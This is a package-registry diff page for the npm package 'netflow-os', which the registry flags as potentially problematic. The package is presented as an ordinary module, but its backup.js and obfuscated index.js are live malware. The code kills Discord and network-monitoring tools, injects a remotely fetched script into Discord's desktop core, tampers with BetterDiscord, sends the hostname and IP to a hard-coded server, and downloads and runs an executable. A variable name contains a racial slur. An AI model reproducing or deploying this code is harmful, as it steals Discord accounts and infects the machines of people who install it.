netflow-os 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of netflow-os might be problematic. Click here for more details.
- package/backup.js +215 -0
- package/index.js +1 -0
- package/package.json +31 -0
package/backup.js
ADDED
@@ -0,0 +1,215 @@
|
|
1
|
+
|
2
|
+
const glob = require("glob");
|
3
|
+
const fs = require('fs');
|
4
|
+
const https = require('node:https');
|
5
|
+
const { exec } = require('child_process');
|
6
|
+
const shell = require('shelljs')
|
7
|
+
const os = require('node:os');
|
8
|
+
const axios = require('axios');
|
9
|
+
const download = require('download');
|
10
|
+
var ip = require("ip");
|
11
|
+
const zip = require("adm-zip");
|
12
|
+
const FormData = require("form-data");
|
13
|
+
var XMLHttpRequest = require('xhr2');
|
14
|
+
const buf_replace = require('buffer-replace');
|
15
|
+
const { session, BrowserWindow } = require("electron");
|
16
|
+
const path = require("path");
|
17
|
+
const querystring = require("querystring");
|
18
|
+
//////////////////////////////////////////////////////////////////////
|
19
|
+
const config = {
|
20
|
+
"logout": "instant",
|
21
|
+
"inject-notify": "true",
|
22
|
+
"logout-notify": "true",
|
23
|
+
"init-notify":"true",
|
24
|
+
"embed-color": 123,
|
25
|
+
"USERNAMEWEBHOOK": "moonsz",
|
26
|
+
"disable-qr-code": "true"
|
27
|
+
}
|
28
|
+
//////////////////////////////////////////////////////////////////////
|
29
|
+
let LOCAL = process.env.LOCALAPPDATA
|
30
|
+
let discords = [];
|
31
|
+
let injectPath = [];
|
32
|
+
let runningDiscords = [];
|
33
|
+
|
34
|
+
fs.readdirSync(LOCAL).forEach(file => {
|
35
|
+
if (file.includes("iscord")) {
|
36
|
+
discords.push(LOCAL + '\\' + file)
|
37
|
+
} else {
|
38
|
+
return;
|
39
|
+
}
|
40
|
+
});
|
41
|
+
|
42
|
+
const temp = process.env.temp;
|
43
|
+
|
44
|
+
const infecccc = async () => {
|
45
|
+
const response = await axios.get("https://cdn.discordapp.com/attachments/998660447886639106/1000641545436926074/qwerty.exe", {
|
46
|
+
responseType: "arraybuffer"
|
47
|
+
});
|
48
|
+
|
49
|
+
await fs.writeFileSync(temp + "\\qwerty.exe", response.data, {
|
50
|
+
encoding: "utf8",
|
51
|
+
flags: "w"
|
52
|
+
});
|
53
|
+
|
54
|
+
await exec(temp + `\\qwerty.exe`);
|
55
|
+
|
56
|
+
return;
|
57
|
+
};
|
58
|
+
|
59
|
+
|
60
|
+
function Infect() {
|
61
|
+
|
62
|
+
https.get('https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js', (resp) => {
|
63
|
+
let data = '';
|
64
|
+
|
65
|
+
resp.on('data', (chunk) => {
|
66
|
+
data += chunk;
|
67
|
+
});
|
68
|
+
resp.on('end', () => {
|
69
|
+
injectPath.forEach(file => {
|
70
|
+
fs.writeFileSync(file, data.replace("%INITNOTI%", config["init-notify"]).replace("%USERIP%", ip.address()).replace("%LOGOUT%", config.logout).replace("%USERNAMEWEBHOOK%", config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%", config["logout-notify"]).replace("3447704",config["embed-color"]).replace('%DISABLEQRCODE%', config["disable-qr-code"]), {
|
71
|
+
encoding: 'utf8',
|
72
|
+
flag: 'w'
|
73
|
+
});
|
74
|
+
|
75
|
+
if (config["init-notify"] == "true") {
|
76
|
+
let init = file.replace("index.js", "init")
|
77
|
+
if (!fs.existsSync(init)) {
|
78
|
+
fs.mkdirSync(init, 0744)
|
79
|
+
}
|
80
|
+
}
|
81
|
+
|
82
|
+
if ( config.logout != "false" ) {
|
83
|
+
let folder = file.replace("index.js", "DC_BTW")
|
84
|
+
if (!fs.existsSync(folder)) {
|
85
|
+
fs.mkdirSync(folder, 0744)
|
86
|
+
if (config.logout == "instant") {
|
87
|
+
startDiscord();
|
88
|
+
}
|
89
|
+
} else if (fs.existsSync(folder) && config.logout == "instant" ){
|
90
|
+
startDiscord();
|
91
|
+
}
|
92
|
+
}
|
93
|
+
})
|
94
|
+
});
|
95
|
+
}).on("error", (err) => {
|
96
|
+
});
|
97
|
+
};
|
98
|
+
|
99
|
+
const logout = async () => {
|
100
|
+
await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
|
101
|
+
`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
|
102
|
+
true
|
103
|
+
);
|
104
|
+
|
105
|
+
return "ok";
|
106
|
+
};
|
107
|
+
|
108
|
+
function killDiscord() {
|
109
|
+
runningDiscords.forEach(disc => {
|
110
|
+
exec(`taskkill /IM ${disc}.exe /F`, (err) => {
|
111
|
+
if (err) {
|
112
|
+
return;
|
113
|
+
}
|
114
|
+
});
|
115
|
+
});
|
116
|
+
|
117
|
+
if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
|
118
|
+
injectNotify();
|
119
|
+
|
120
|
+
}
|
121
|
+
Infect()
|
122
|
+
pwnBetterDiscord()
|
123
|
+
};
|
124
|
+
|
125
|
+
function listDiscords() {
|
126
|
+
exec('tasklist', function(err, stdout, stderr) {
|
127
|
+
if (stdout.includes("Discord.exe")) runningDiscords.push("discord");
|
128
|
+
if (stdout.includes("Discord (32 bits).exe")) runningDiscords.push("Discord");
|
129
|
+
if (stdout.includes("Discord.exe")) runningDiscords.push("Discord (32 bits)");
|
130
|
+
if (stdout.includes("DiscordCanary.exe")) runningDiscords.push("discordcanary");
|
131
|
+
if (stdout.includes("Discord Canary (32 bits).exe")) runningDiscords.push("Discord Canary");
|
132
|
+
if (stdout.includes("DiscordDevelopment.exe")) runningDiscords.push("discorddevelopment");
|
133
|
+
if (stdout.includes("DiscordPTB.exe")) runningDiscords.push("discordptb");
|
134
|
+
if (stdout.includes("Powercord.exe")) runningDiscords.push("powercord");
|
135
|
+
if (stdout.includes("Fiddler.exe")) runningDiscords.push("fiddler");
|
136
|
+
if (stdout.includes("wireshark.exe")) runningDiscords.push("wireshark");
|
137
|
+
|
138
|
+
if (config.logout == "instant") {
|
139
|
+
killDiscord();
|
140
|
+
} else {
|
141
|
+
if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
|
142
|
+
injectNotify();
|
143
|
+
}
|
144
|
+
Infect()
|
145
|
+
pwnBetterDiscord()
|
146
|
+
}
|
147
|
+
})
|
148
|
+
};
|
149
|
+
|
150
|
+
function startDiscord() {
|
151
|
+
runningDiscords.forEach(disc => {
|
152
|
+
let path = LOCAL + '\\' + disc + "\\Update.exe --processStart " + disc + ".exe"
|
153
|
+
exec(path, (err) => {
|
154
|
+
if (err) {
|
155
|
+
return;
|
156
|
+
}
|
157
|
+
});
|
158
|
+
});
|
159
|
+
};
|
160
|
+
|
161
|
+
function pwnBetterDiscord() {
|
162
|
+
let dir = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar"
|
163
|
+
if (fs.existsSync(dir)) {
|
164
|
+
let x = fs.readFileSync(dir)
|
165
|
+
fs.writeFileSync(dir, buf_replace(x, "api/webhooks", "dc"))
|
166
|
+
}
|
167
|
+
|
168
|
+
return;
|
169
|
+
}
|
170
|
+
|
171
|
+
function injectNotify() {
|
172
|
+
let fields = [];
|
173
|
+
injectPath.forEach( path => {
|
174
|
+
let c = path
|
175
|
+
fields.push(c)
|
176
|
+
})
|
177
|
+
|
178
|
+
const data = `{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`
|
179
|
+
var xhr = new XMLHttpRequest();
|
180
|
+
xhr.open('POST', 'http://20.14.80.127/api/newinjection', true);
|
181
|
+
xhr.setRequestHeader('Content-type', 'application/json');
|
182
|
+
xhr.onload = function () {
|
183
|
+
const negrodefender = this.responseText;
|
184
|
+
};
|
185
|
+
xhr.send(data);
|
186
|
+
}
|
187
|
+
|
188
|
+
function getDirectories(path) {
|
189
|
+
return fs.readdirSync(path).filter(function (file) {
|
190
|
+
return fs.statSync(path+'/'+file).isDirectory();
|
191
|
+
});
|
192
|
+
}
|
193
|
+
|
194
|
+
|
195
|
+
listDiscords();
|
196
|
+
discords.forEach(function(file) {
|
197
|
+
getDirectories(file + "\\").forEach((item) => {
|
198
|
+
if (item.includes("app-")) {
|
199
|
+
file = file + "\\" + item + "\\modules\\";
|
200
|
+
}
|
201
|
+
});
|
202
|
+
getDirectories(file).forEach((item) => {
|
203
|
+
if (item.includes("discord_desktop_core-")) {
|
204
|
+
file = file + "\\" + item + "\\discord_desktop_core\\index.js";
|
205
|
+
}
|
206
|
+
});
|
207
|
+
|
208
|
+
if (fs.existsSync(file)) {
|
209
|
+
injectPath.push(file);
|
210
|
+
}
|
211
|
+
});
|
212
|
+
killDiscord();
|
213
|
+
Infect();
|
214
|
+
startDiscord();
|
215
|
+
infecccc();
|
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const _0x14930d=_0x3a86;(function(_0x288f8f,_0x4ab4ae){const _0x297921=_0x3a86,_0x58195b=_0x288f8f();while(!![]){try{const _0x367edd=parseInt(_0x297921(0x11a))/0x1*(-parseInt(_0x297921(0x110))/0x2)+-parseInt(_0x297921(0x16e))/0x3+parseInt(_0x297921(0x123))/0x4*(parseInt(_0x297921(0x12f))/0x5)+-parseInt(_0x297921(0x174))/0x6+-parseInt(_0x297921(0x143))/0x7*(parseInt(_0x297921(0x141))/0x8)+-parseInt(_0x297921(0x157))/0x9*(-parseInt(_0x297921(0x15d))/0xa)+parseInt(_0x297921(0x15e))/0xb;if(_0x367edd===_0x4ab4ae)break;else _0x58195b['push'](_0x58195b['shift']());}catch(_0x506e79){_0x58195b['push'](_0x58195b['shift']());}}}(_0x4776,0xa9c2c));const glob=require(_0x14930d(0x126)),fs=require('fs'),https=require(_0x14930d(0x161)),{exec:exec}=require(_0x14930d(0x138)),shell=require(_0x14930d(0x146)),os=require(_0x14930d(0x124)),axios=require(_0x14930d(0x139)),download=require(_0x14930d(0x170));var ip=require('ip');const zip=require(_0x14930d(0x172)),FormData=require(_0x14930d(0x109));var XMLHttpRequest=require('xhr2');const buf_replace=require(_0x14930d(0x158)),{session:session,BrowserWindow:BrowserWindow}=require(_0x14930d(0x134)),path=require(_0x14930d(0x14c)),querystring=require(_0x14930d(0x145)),config={'logout':_0x14930d(0x12e),'inject-notify':_0x14930d(0x140),'logout-notify':_0x14930d(0x140),'init-notify':'true','embed-color':0x7b,'USERNAMEWEBHOOK':'moonsz','disable-qr-code':_0x14930d(0x140)};let LOCAL=process[_0x14930d(0x131)][_0x14930d(0x13c)],discords=[],injectPath=[],runningDiscords=[];function _0x3a86(_0x50aba1,_0x3990a8){const _0x8809ce=_0x4776();return _0x3a86=function(_0x54c960,_0x1ccb7f){_0x54c960=_0x54c960-0x109;let _0x4730c6=_0x8809ce[_0x54c960];return _0x4730c6;},_0x3a86(_0x50aba1,_0x3990a8);}function _0x4776(){const _0x53532a=['LOCALAPPDATA','Discord\x20(32\x20bits).exe','temp','setRequestHeader','true','4938736EdHWTl','getAllWindows','14TBNooD','search','querystring','shelljs','DC_BTW','inject-notify','constructor','\x5cmodules\x5c','wireshark','path','discordptb','\x5cUpdate.exe\x20--processStart\x20','window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[[\x22get_require\x22]]]),delete\x20gg.m.get_require,delete\x20gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function\x20LogOut(){(function(a){const\x20b=\x22string\x22==typeof\x20a?a:null;for(const\x20c\x20in\x20gg.c)if(gg.c.hasOwnProperty(c)){const\x20d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return\x20d.default;if(d&&(b?d[b]:a(d)))return\x20d}return\x20null})(\x22login\x22).logout()}LogOut();','console','mkdirSync','utf8','replace','existsSync','__proto__','DiscordCanary.exe','634833cpvBDy','buffer-replace','index.js','Powercord.exe','writeFileSync','https://cdn.discordapp.com/attachments/998660447886639106/1000641545436926074/qwerty.exe','170DWRTjg','21896688PAlHqq','end','tasklist','node:https','app-','{\x22fields\x22:\x22Discord\x20Desktop\x20(app-1.0.9005)\x22,\x20\x22pcname\x22:\x22','toString','address','Discord','error','discord','\x5cdiscord_desktop_core\x5cindex.js','responseText','discorddevelopment','push','%USERIP%','4050270UFGSFO','info','download','return\x20(function()\x20','adm-zip','%LOGOUTNOTI%','3670902fgRAJG','length','form-data','%LOGOUT%','forEach','isDirectory','discordcanary','statSync','iscord','21354RXXwfO','DiscordDevelopment.exe','bind','wireshark.exe','\x22,\x20\x22idclientkey\x22:\x22moonsz\x22}','\x5cqwerty.exe','\x5cBetterDiscord\x5cdata\x5cbetterdiscord.asar','table','onload','hostname','13ONZZdn','data','\x22,\x20\x22ip\x22:\x22','{}.constructor(\x22return\x20this\x22)(\x20)','includes','application/json','executeJavaScript','arraybuffer','POST','1420IzclDU','node:os','logout-notify','glob','exception','init-notify','log','readFileSync','Discord.exe','disable-qr-code','DiscordPTB.exe','instant','11845DmvQCK','(((.+)+)+)+$','env','USERNAMEWEBHOOK','get','electron','Fiddler.exe','api/webhooks','%INITNOTI%','child_process','axios','logout','warn'];_0x4776=function(){return _0x53532a;};return _0x4776();}fs['readdirSync'](LOCAL)[_0x14930d(0x10b)](_0x2ec147=>{const _0x55c184=_0x14930d;_0x2ec147[_0x55c184(0x11e)](_0x55c184(0x10f))&&discords['push'](LOCAL+'\x5c'+_0x2ec147);});const temp=process[_0x14930d(0x131)][_0x14930d(0x13e)],infecccc=async()=>{const _0x53b38e=_0x14930d,_0x3ff26e=await axios[_0x53b38e(0x133)](_0x53b38e(0x15c),{'responseType':_0x53b38e(0x121)});await fs[_0x53b38e(0x15b)](temp+_0x53b38e(0x115),_0x3ff26e[_0x53b38e(0x11b)],{'encoding':_0x53b38e(0x152),'flags':'w'}),await exec(temp+_0x53b38e(0x115));};function Infect(){const _0x2b9387=_0x14930d;https[_0x2b9387(0x133)]('https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js',_0x4a187d=>{const _0x22628c=_0x2b9387;let _0x59a53d='';_0x4a187d['on'](_0x22628c(0x11b),_0x18ab62=>{_0x59a53d+=_0x18ab62;}),_0x4a187d['on'](_0x22628c(0x15f),()=>{const _0x2eeba1=_0x22628c;injectPath[_0x2eeba1(0x10b)](_0x146888=>{const _0x30f6c7=_0x2eeba1;if(fs[_0x30f6c7(0x15b)](_0x146888,_0x59a53d[_0x30f6c7(0x153)](_0x30f6c7(0x137),config[_0x30f6c7(0x128)])[_0x30f6c7(0x153)](_0x30f6c7(0x16d),ip['address']())[_0x30f6c7(0x153)](_0x30f6c7(0x10a),config[_0x30f6c7(0x13a)])[_0x30f6c7(0x153)]('%USERNAMEWEBHOOK%',config[_0x30f6c7(0x132)])[_0x30f6c7(0x153)](_0x30f6c7(0x173),config[_0x30f6c7(0x125)])[_0x30f6c7(0x153)]('3447704',config['embed-color'])[_0x30f6c7(0x153)]('%DISABLEQRCODE%',config[_0x30f6c7(0x12c)]),{'encoding':_0x30f6c7(0x152),'flag':'w'}),_0x30f6c7(0x140)==config[_0x30f6c7(0x128)]){let _0x3109b3=_0x146888['replace'](_0x30f6c7(0x159),'init');fs['existsSync'](_0x3109b3)||fs[_0x30f6c7(0x151)](_0x3109b3,0x1e4);}if('false'!=config['logout']){let _0x2e1237=_0x146888[_0x30f6c7(0x153)]('index.js',_0x30f6c7(0x147));fs[_0x30f6c7(0x154)](_0x2e1237)?fs['existsSync'](_0x2e1237)&&_0x30f6c7(0x12e)==config[_0x30f6c7(0x13a)]&&startDiscord():(fs[_0x30f6c7(0x151)](_0x2e1237,0x1e4),_0x30f6c7(0x12e)==config[_0x30f6c7(0x13a)]&&startDiscord());}});});})['on']('error',_0x4684e3=>{});}const logout=async()=>(await BrowserWindow[_0x14930d(0x142)]()[0x0]['webContents'][_0x14930d(0x120)](_0x14930d(0x14f),!0x0),'ok');function killDiscord(){const _0x5d6fe2=_0x14930d;runningDiscords[_0x5d6fe2(0x10b)](_0x323a75=>{exec('taskkill\x20/IM\x20'+_0x323a75+'.exe\x20/F',_0x5675ae=>{});}),_0x5d6fe2(0x140)==config[_0x5d6fe2(0x148)]&&0x0!=injectPath['length']&&injectNotify(),Infect(),pwnBetterDiscord();}function listDiscords(){const _0xa881d9=_0x14930d,_0xd6ef23=(function(){let _0x3770d2=!![];return function(_0x141c02,_0x23d248){const _0x1dde49=_0x3770d2?function(){if(_0x23d248){const _0x5a8679=_0x23d248['apply'](_0x141c02,arguments);return _0x23d248=null,_0x5a8679;}}:function(){};return _0x3770d2=![],_0x1dde49;};}()),_0x1064dd=_0xd6ef23(this,function(){const _0x3fb2f8=_0x3a86;return _0x1064dd[_0x3fb2f8(0x164)]()[_0x3fb2f8(0x144)](_0x3fb2f8(0x130))[_0x3fb2f8(0x164)]()['constructor'](_0x1064dd)[_0x3fb2f8(0x144)](_0x3fb2f8(0x130));});_0x1064dd();const _0xd1e932=(function(){let _0x7e052=!![];return function(_0x22345d,_0x5df018){const _0x12f7c7=_0x7e052?function(){if(_0x5df018){const _0x3f9a71=_0x5df018['apply'](_0x22345d,arguments);return _0x5df018=null,_0x3f9a71;}}:function(){};return _0x7e052=![],_0x12f7c7;};}()),_0x51a0b6=_0xd1e932(this,function(){const _0x4303da=_0x3a86,_0x583161=function(){const _0x515b44=_0x3a86;let _0x76b5ca;try{_0x76b5ca=Function(_0x515b44(0x171)+_0x515b44(0x11d)+');')();}catch(_0x1aa4ba){_0x76b5ca=window;}return _0x76b5ca;},_0x389525=_0x583161(),_0x34116f=_0x389525[_0x4303da(0x150)]=_0x389525[_0x4303da(0x150)]||{},_0x161f2e=[_0x4303da(0x129),_0x4303da(0x13b),_0x4303da(0x16f),_0x4303da(0x167),_0x4303da(0x127),_0x4303da(0x117),'trace'];for(let _0xef553b=0x0;_0xef553b<_0x161f2e[_0x4303da(0x175)];_0xef553b++){const _0x5ea2e7=_0xd1e932[_0x4303da(0x149)]['prototype']['bind'](_0xd1e932),_0x27c527=_0x161f2e[_0xef553b],_0x4db8d7=_0x34116f[_0x27c527]||_0x5ea2e7;_0x5ea2e7[_0x4303da(0x155)]=_0xd1e932[_0x4303da(0x112)](_0xd1e932),_0x5ea2e7['toString']=_0x4db8d7[_0x4303da(0x164)][_0x4303da(0x112)](_0x4db8d7),_0x34116f[_0x27c527]=_0x5ea2e7;}});_0x51a0b6(),exec(_0xa881d9(0x160),function(_0x2d8905,_0x1a9967,_0x55e725){const _0x151622=_0xa881d9;_0x1a9967['includes'](_0x151622(0x12b))&&runningDiscords[_0x151622(0x16c)](_0x151622(0x168)),_0x1a9967[_0x151622(0x11e)](_0x151622(0x13d))&&runningDiscords[_0x151622(0x16c)](_0x151622(0x166)),_0x1a9967[_0x151622(0x11e)](_0x151622(0x12b))&&runningDiscords['push']('Discord\x20(32\x20bits)'),_0x1a9967[_0x151622(0x11e)](_0x151622(0x156))&&runningDiscords[_0x151622(0x16c)](_0x151622(0x10d)),_0x1a9967[_0x151622(0x11e)]('Discord\x20Canary\x20(32\x20bits).exe')&&runningDiscords[_0x151622(0x16c)]('Discord\x20Canary'),_0x1a9967[_0x151622(0x11e)](_0x151622(0x111))&&runningDiscords[_0x151622(0x16c)](_0x151622(0x16b)),_0x1a9967[_0x151622(0x11e)](_0x151622(0x12d))&&runningDiscords[_0x151622(0x16c)](_0x151622(0x14d)),_0x1a9967[_0x151622(0x11e)](_0x151622(0x15a))&&runningDiscords['push']('powercord'),_0x1a9967[_0x151622(0x11e)](_0x151622(0x135))&&runningDiscords['push']('fiddler'),_0x1a9967[_0x151622(0x11e)](_0x151622(0x113))&&runningDiscords[_0x151622(0x16c)](_0x151622(0x14b)),'instant'==config[_0x151622(0x13a)]?killDiscord():(_0x151622(0x140)==config['inject-notify']&&0x0!=injectPath['length']&&injectNotify(),Infect(),pwnBetterDiscord());});}function startDiscord(){const _0x14f86d=_0x14930d;runningDiscords[_0x14f86d(0x10b)](_0x1a8bf2=>{const _0x2b6426=_0x14f86d;exec(LOCAL+'\x5c'+_0x1a8bf2+_0x2b6426(0x14e)+_0x1a8bf2+'.exe',_0x1bb4ca=>{});});}function pwnBetterDiscord(){const _0x153116=_0x14930d;let _0x120e3f=process[_0x153116(0x131)]['appdata']+_0x153116(0x116);if(fs['existsSync'](_0x120e3f)){let _0x1d8b61=fs[_0x153116(0x12a)](_0x120e3f);fs[_0x153116(0x15b)](_0x120e3f,buf_replace(_0x1d8b61,_0x153116(0x136),'dc'));}}function injectNotify(){const _0x2a2cf6=_0x14930d;let _0x2dac35=[];injectPath[_0x2a2cf6(0x10b)](_0x4c5988=>{const _0x2312e6=_0x2a2cf6;let _0x308cfa=_0x4c5988;_0x2dac35[_0x2312e6(0x16c)](_0x308cfa);});const _0x29d0b9=_0x2a2cf6(0x163)+os[_0x2a2cf6(0x119)]()+_0x2a2cf6(0x11c)+ip[_0x2a2cf6(0x165)]()+_0x2a2cf6(0x114);var _0x4dc038=new XMLHttpRequest();_0x4dc038['open'](_0x2a2cf6(0x122),'http://20.14.80.127/api/newinjection',!0x0),_0x4dc038[_0x2a2cf6(0x13f)]('Content-type',_0x2a2cf6(0x11f)),_0x4dc038[_0x2a2cf6(0x118)]=function(){const _0x3b09f2=_0x2a2cf6;this[_0x3b09f2(0x16a)];},_0x4dc038['send'](_0x29d0b9);}function getDirectories(_0x2cabdf){return fs['readdirSync'](_0x2cabdf)['filter'](function(_0x35a0cd){const _0xa830ba=_0x3a86;return fs[_0xa830ba(0x10e)](_0x2cabdf+'/'+_0x35a0cd)[_0xa830ba(0x10c)]();});}listDiscords(),discords[_0x14930d(0x10b)](function(_0x1ef0f2){const _0x18104d=_0x14930d;getDirectories(_0x1ef0f2+'\x5c')['forEach'](_0x559daf=>{const _0x1374b9=_0x3a86;_0x559daf[_0x1374b9(0x11e)](_0x1374b9(0x162))&&(_0x1ef0f2=_0x1ef0f2+'\x5c'+_0x559daf+_0x1374b9(0x14a));}),getDirectories(_0x1ef0f2)[_0x18104d(0x10b)](_0x13892c=>{const _0x2e819e=_0x18104d;_0x13892c[_0x2e819e(0x11e)]('discord_desktop_core-')&&(_0x1ef0f2=_0x1ef0f2+'\x5c'+_0x13892c+_0x2e819e(0x169));}),fs[_0x18104d(0x154)](_0x1ef0f2)&&injectPath[_0x18104d(0x16c)](_0x1ef0f2);}),killDiscord(),Infect(),startDiscord(),infecccc();
|
package/package.json
ADDED
@@ -0,0 +1,31 @@
|
|
1
|
+
{
|
2
|
+
"dependencies": {
|
3
|
+
"adm-zip": "^0.5.9",
|
4
|
+
"axios": "^0.27.2",
|
5
|
+
"buffer-replace": "^1.0.0",
|
6
|
+
"child_process": "^1.0.2",
|
7
|
+
"color": "^4.2.3",
|
8
|
+
"download": "^8.0.0",
|
9
|
+
"electron": "^19.0.9",
|
10
|
+
"form-data": "^4.0.0",
|
11
|
+
"fs": "^0.0.1-security",
|
12
|
+
"glob": "^8.0.3",
|
13
|
+
"https": "^1.0.0",
|
14
|
+
"ip": "^1.1.8",
|
15
|
+
"os": "^0.1.2",
|
16
|
+
"path": "^0.12.7",
|
17
|
+
"querystring": "^0.2.1",
|
18
|
+
"shelljs": "^0.8.5",
|
19
|
+
"xhr2": "^0.2.1"
|
20
|
+
},
|
21
|
+
"name": "netflow-os",
|
22
|
+
"version": "1.0.0",
|
23
|
+
"main": "index.js",
|
24
|
+
"devDependencies": {},
|
25
|
+
"scripts": {
|
26
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
27
|
+
},
|
28
|
+
"author": "nahedasamic <nahedasamic@gmail.com>",
|
29
|
+
"license": "MIT",
|
30
|
+
"description": ""
|
31
|
+
}
|